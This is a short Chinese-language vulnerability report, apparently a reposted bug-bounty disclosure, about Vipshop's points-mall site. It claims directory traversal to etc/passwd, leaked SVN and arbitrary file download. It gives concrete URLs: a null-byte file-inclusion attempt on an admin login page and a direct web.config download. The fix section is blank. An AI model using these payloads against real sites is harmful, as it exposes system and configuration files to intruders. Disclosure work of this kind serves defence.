积分商城,貌似与主站关联。 还不只这些,SVN也泄了.....
总之敏感信息太多了,收集些信息干XXOO的事情还算比较容易。
详细说明:
这里目录遍历 etc/passwd
还可以包含?
任意文件下载 比如web.config
漏洞 证明:
目录遍历 etc/passwd
这里是包含?好像做了限制!不确定。
http://jf.vipshop.com/jfhoutaiadmin/index.php?a=login&m=robots.txt%00.php
下载 文件
http://jf.vipshop.com/web.config
修复方案:
.....
查看更多关于唯品会(Vipshop) 目录遍历与文件包含 - 网站安全的详细内容...
声明:本文来自网络,不代表【好得很程序员自学网】立场,转载请注明出处:http://www.haodehen.cn/did14645